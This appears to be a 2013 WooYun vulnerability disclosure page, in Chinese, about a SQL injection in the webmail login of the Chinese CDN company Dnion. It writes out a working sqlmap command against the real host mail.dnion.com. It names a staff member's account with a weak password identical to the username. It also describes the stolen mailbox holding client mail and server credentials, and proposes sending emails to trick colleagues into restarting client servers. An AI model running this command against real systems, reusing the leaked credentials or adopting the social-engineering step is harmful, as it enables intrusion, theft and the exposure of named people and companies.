当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039040

漏洞标题:帝联科技邮件系统SQL注射漏洞(可能泄露腾讯/淘宝敏感信息)

相关厂商:帝联科技

漏洞作者: 专业种田

提交时间:2013-10-07 21:15

修复时间:2013-11-21 21:16

公开时间:2013-11-21 21:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

进入运维人员邮箱

详细说明:

mail.dnion.com 登录处用户名注入

python sqlmap/sqlmap.py -u "http://mail.dnion.com/login.php?Cmd=login" --data "name=cdn&domain=dnion.com&passwd=d&language=-" -v 1 -p "name" --string "用户密码错误"


clipboard.png


密码是加密的:类似$1$UkC3YzAO$IcAsvJRvnhOoWv2Drov2,破解不了。
于是跑出用户名,然后破解弱口令

11.jpg


运气好,有个运维人员的弱口令

用户名:huangxinfeng 密码:huangxinfeng


邮箱内很多敏感信息,可继续利用,发邮件让同事重启其它客户服务器等。

漏洞证明:

1.腾讯相关的邮件

22.jpg

qq.jpg


2.淘宝相关的邮件

taobao.png


3.服务器远程帐号密码

server.png

修复方案:

过滤

版权声明:转载请注明来源 专业种田@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝